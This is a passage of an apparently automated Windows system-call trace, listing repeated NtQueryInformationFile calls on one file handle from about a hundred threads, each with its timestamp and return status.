IoStatusBlock=0x487ff28, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487ff28, FileInformation=0x44d8128) returned 0x0 Thread: id = 185 os_tid = 0x2c4 [0151.524] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dff18, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dff18, FileInformation=0x44d8128) returned 0x0 Thread: id = 186 os_tid = 0x890 [0151.525] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42eff08, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42eff08, FileInformation=0x44d8128) returned 0x0 Thread: id = 187 os_tid = 0x4e8 [0151.527] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48ef8a8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48ef8a8, FileInformation=0x44d8128) returned 0x0 Thread: id = 188 os_tid = 0xcc [0151.529] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fd58, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fd58, FileInformation=0x44d8128) returned 0x0 Thread: id = 189 os_tid = 0xd0 [0151.531] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430ff00, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430ff00, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 190 os_tid = 0xd4 [0151.533] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x484fb78, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x484fb78, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 191 os_tid = 0xd8 [0151.534] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48cfae8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48cfae8, FileInformation=0x44d8128) returned 0x0 Thread: id = 192 os_tid = 0xdc [0151.536] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfab8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfab8, FileInformation=0x44d8128) returned 0x0 Thread: id = 193 os_tid = 0xe0 [0151.538] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fda8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fda8, FileInformation=0x44d8128) returned 0x0 Thread: id = 194 os_tid = 0xe4 [0151.540] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfdc0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfdc0, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 195 os_tid = 0xe8 [0151.541] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479ff58, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479ff58, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 196 os_tid = 0xec [0151.543] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fdb0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fdb0, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 197 os_tid = 0x748 [0151.544] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430f818, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430f818, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 198 os_tid = 0xc4 [0151.546] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffe18, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffe18, FileInformation=0x44d8128) returned 0x0 Thread: id = 199 os_tid = 0x620 [0151.548] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482fea0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482fea0, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 200 os_tid = 0x910 [0151.550] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fee0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fee0, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 201 os_tid = 0x950 [0151.551] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bf938, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bf938, FileInformation=0x44d8128) returned 0x0 Thread: id = 202 os_tid = 0x940 [0151.553] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48efd58, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48efd58, FileInformation=0x44d8128) returned 0x0 Thread: id = 203 os_tid = 0x980 [0151.555] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48cfb10, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48cfb10, FileInformation=0x44d8128) returned 0x0 Thread: id = 204 os_tid = 0xa10 [0151.557] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477f858, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477f858, FileInformation=0x44d8128) returned 0x0 Thread: id = 205 os_tid = 0x72c [0151.558] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477f898, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477f898, FileInformation=0x44d8128) returned 0x0 Thread: id = 206 os_tid = 0x9e0 [0151.560] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483f988, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483f988, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 207 os_tid = 0x9c4 [0151.561] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476f830, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476f830, FileInformation=0x44d8128) returned 0x0 Thread: id = 208 os_tid = 0xa6c [0151.563] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477ff50, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477ff50, FileInformation=0x44d8128) returned 0x0 Thread: id = 209 os_tid = 0xb00 [0151.565] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfe28, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfe28, FileInformation=0x44d8128) returned 0x0 Thread: id = 210 os_tid = 0xaf8 [0151.568] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x492f9a8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x492f9a8, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 211 os_tid = 0xae4 [0151.569] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fad0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fad0, FileInformation=0x44d8128) returned 0x0 Thread: id = 212 os_tid = 0x344 [0151.571] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486f910, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486f910, FileInformation=0x44d8128) returned 0x0 Thread: id = 213 os_tid = 0x808 [0151.573] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bf9a0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bf9a0, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 214 os_tid = 0x858 [0151.574] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48ef830, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48ef830, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 215 os_tid = 0x224 [0151.576] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488fa30, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488fa30, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 216 os_tid = 0x4dc [0151.578] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477f820, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477f820, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 217 os_tid = 0x78c [0151.579] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfe80, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfe80, FileInformation=0x44d8128) returned 0x0 Thread: id = 218 os_tid = 0xb0 [0151.581] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfd00, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfd00, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 219 os_tid = 0x314 [0151.582] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fb78, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fb78, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 220 os_tid = 0x804 [0151.585] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432f938, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432f938, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 221 os_tid = 0x854 [0151.587] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfa60, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfa60, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 222 os_tid = 0xa78 [0151.588] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bf950, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bf950, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 223 os_tid = 0x6a8 [0151.590] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fc70, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fc70, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 224 os_tid = 0x7a8 [0151.593] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fed8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fed8, FileInformation=0x44d8128) returned 0x0 Thread: id = 225 os_tid = 0x330 [0151.595] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fe20, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fe20, FileInformation=0x44d8128) returned 0x0 Thread: id = 226 os_tid = 0x3a4 [0151.597] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432ff30, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432ff30, FileInformation=0x44d8128) returned 0x0 Thread: id = 227 os_tid = 0x67c [0151.599] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fe48, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fe48, FileInformation=0x44d8128) returned 0x0 Thread: id = 228 os_tid = 0x5cc [0151.605] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434f9f8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434f9f8, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 229 os_tid = 0x840 [0151.608] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fe48, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fe48, FileInformation=0x44d8128) returned 0x0 Thread: id = 230 os_tid = 0x69c [0151.610] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfbc8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfbc8, FileInformation=0x44d8128) returned 0x0 Thread: id = 231 os_tid = 0x6f0 [0151.612] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48afc48, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48afc48, FileInformation=0x44d8128) returned 0x0 Thread: id = 232 os_tid = 0x810 [0151.615] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x478fb68, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x478fb68, FileInformation=0x44d8128) returned 0x0 Thread: id = 233 os_tid = 0xa88 [0151.617] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434ff00, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434ff00, FileInformation=0x44d8128) returned 0x0 Thread: id = 234 os_tid = 0x43c [0151.620] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x480fa88, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x480fa88, FileInformation=0x44d8128) returned 0x0 Thread: id = 235 os_tid = 0x670 [0151.622] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490ff18, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490ff18, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 236 os_tid = 0xa14 [0151.626] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486fa88, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486fa88, FileInformation=0x44d8128) returned 0x0 Thread: id = 237 os_tid = 0x990 [0151.628] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fbc8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fbc8, FileInformation=0x44d8128) returned 0x0 Thread: id = 238 os_tid = 0x2dc [0151.630] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cfbb8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cfbb8, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 239 os_tid = 0x74c [0151.633] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x478fc08, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x478fc08, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 240 os_tid = 0x3c4 [0151.635] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489f878, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489f878, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 241 os_tid = 0x90 [0151.638] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486fcd8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486fcd8, FileInformation=0x44d8128) returned 0x0 Thread: id = 242 os_tid = 0x630 [0151.640] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x484f7e8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x484f7e8, FileInformation=0x44d8128) returned 0x0 Thread: id = 243 os_tid = 0x124 [0151.642] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fd48, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fd48, FileInformation=0x44d8128) returned 0x0 Thread: id = 244 os_tid = 0xc0 [0151.645] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48cfef0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48cfef0, FileInformation=0x44d8128) returned 0x0 Thread: id = 245 os_tid = 0x360 [0151.647] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47df908, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47df908, FileInformation=0x44d8128) returned 0x0 Thread: id = 246 os_tid = 0x920 [0151.650] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fab0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fab0, FileInformation=0x44d8128) returned 0x0 Thread: id = 247 os_tid = 0xbec [0151.653] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48efca8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48efca8, FileInformation=0x44d8128) returned 0x0 Thread: id = 248 os_tid = 0x6b8 [0151.656] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x492fc10, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x492fc10, FileInformation=0x44d8128) returned 0x0 Thread: id = 249 os_tid = 0x30c [0151.658] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489ff10, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489ff10, FileInformation=0x44d8128) returned 0x0 Thread: id = 250 os_tid = 0xbfc [0151.661] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x494f9b8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x494f9b8, FileInformation=0x44d8128) returned 0x0 Thread: id = 251 os_tid = 0x3f8 [0151.663] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47df948, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47df948, FileInformation=0x44d8128) returned 0x0 Thread: id = 252 os_tid = 0x6cc [0151.665] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef850, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef850, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 253 os_tid = 0x830 [0151.668] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x478fca8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x478fca8, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 254 os_tid = 0x75c [0151.671] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48efdf0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48efdf0, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 255 os_tid = 0x7f0 [0151.673] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488fcc0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488fcc0, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 256 os_tid = 0x710 [0151.675] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fe58, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fe58, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 257 os_tid = 0x5d8 [0151.677] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dff08, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dff08, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 258 os_tid = 0xbe4 [0151.688] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fd58, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fd58, FileInformation=0x44d8128) returned 0x0 Thread: id = 259 os_tid = 0x600 [0151.690] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477f9b0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477f9b0, FileInformation=0x44d8128) returned 0x0 Thread: id = 260 os_tid = 0xbd0 [0151.692] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfef8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfef8, FileInformation=0x44d8128) returned 0x0 Thread: id = 261 os_tid = 0x158 [0151.695] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fe28, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fe28, FileInformation=0x44d8128) returned 0x0 Thread: id = 262 os_tid = 0xbd8 [0151.697] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432f7b8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432f7b8, FileInformation=0x44d8128) returned 0x0 Thread: id = 263 os_tid = 0xbe8 [0151.699] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476fcf0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476fcf0, FileInformation=0x44d8128) returned 0x0 Thread: id = 264 os_tid = 0xbdc [0151.701] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfb78, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfb78, FileInformation=0x44d8128) returned 0x0 Thread: id = 265 os_tid = 0x5b4 [0151.703] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483f950, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483f950, FileInformation=0x44d8128) returned 0x0 Thread: id = 266 os_tid = 0x614 [0151.705] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f7f8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f7f8, FileInformation=0x44d8128) returned 0x0 Thread: id = 267 os_tid = 0x690 [0151.708] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488fa68, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488fa68, FileInformation=0x44d8128) returned 0x0 Thread: id = 268 os_tid = 0xa68 [0151.711] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x484fcb0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x484fcb0, FileInformation=0x44d8128) returned 0x0 Thread: id = 269 os_tid = 0x7d0 [0151.713] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cfe28, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cfe28, FileInformation=0x44d8128) returned 0x0 Thread: id = 270 os_tid = 0x7d8 [0151.716] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fac0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fac0, FileInformation=0x44d8128) returned 0x0 Thread: id = 271 os_tid = 0x24c [0151.718] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fa48, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fa48, FileInformation=0x44d8128) returned 0x0 Thread: id = 272 os_tid = 0x9f8 [0151.720] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fc88, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fc88, FileInformation=0x44d8128) returned 0x0 Thread: id = 273 os_tid = 0x798 [0151.722] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fa28, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fa28, FileInformation=0x44d8128) returned 0x0 Thread: id = 274 os_tid = 0xa3c [0151.724] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47afe20, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47afe20, FileInformation=0x44d8128) returned 0x0 Thread: id = 275 os_tid = 0x8c0 [0151.727] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fad0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fad0, FileInformation=0x44d8128) returned 0x0 Thread: id = 276 os_tid = 0x708 [0151.733] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffc18, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffc18, FileInformation=0x44d8128) returned 0x0 Thread: id = 277 os_tid = 0xa64 [0151.735] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487f7e0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487f7e0, FileInformation=0x44d8128) returned 0x0 Thread: id = 278 os_tid = 0xa30 [0151.738] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bf9e0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bf9e0, FileInformation=0x44d8128) returned 0x0 Thread: id = 279 os_tid = 0x388 [0151.741] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487f938, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487f938, FileInformation=0x44d8128) returned 0x0 Thread: id = 280 os_tid = 0x760 [0151.743] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bf920, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bf920, FileInformation=0x44d8128) returned 0x0 Thread: id = 281 os_tid = 0xa54 [0151.745] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47afad0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47afad0, FileInformation=0x44d8128) returned 0x0 Thread: id = 282 os_tid = 0x738 [0151.747] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fd90, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fd90, FileInformation=0x44d8128) returned 0x0 Thread: id = 283 os_tid = 0x488 [0151.750] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430f848, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430f848, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 284 os_tid = 0x6dc [0151.752] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fca8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fca8, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 285 os_tid = 0x7a0 [0151.754] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fc60, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fc60, FileInformation=0x44d8128) returned 0x0 Thread: id = 286 os_tid = 0x73c [0151.757] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bff68, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bff68, FileInformation=0x44d8128) returned 0x0 Thread: id = 287 os_tid = 0x1c0 [0151.759] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fe78, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fe78, FileInformation=0x44d8128) returned 0x0 Thread: id = 288 os_tid = 0x7c4 [0151.762] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cfbe8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cfbe8, FileInformation=0x44d8128) returned 0x0 Thread: id = 289 os_tid = 0x790 [0151.764] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fb10, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fb10, FileInformation=0x44d8128) returned 0x0 Thread: id = 290 os_tid = 0x688 [0151.766] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479faa0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479faa0, FileInformation=0x44d8128) returned 0x0 Thread: id = 291 os_tid = 0x240 [0151.768] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fcd0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fcd0, FileInformation=0x44d8128) returned 0x0 Thread: id = 292 os_tid = 0x8e0 [0151.771] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476fac0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476fac0, 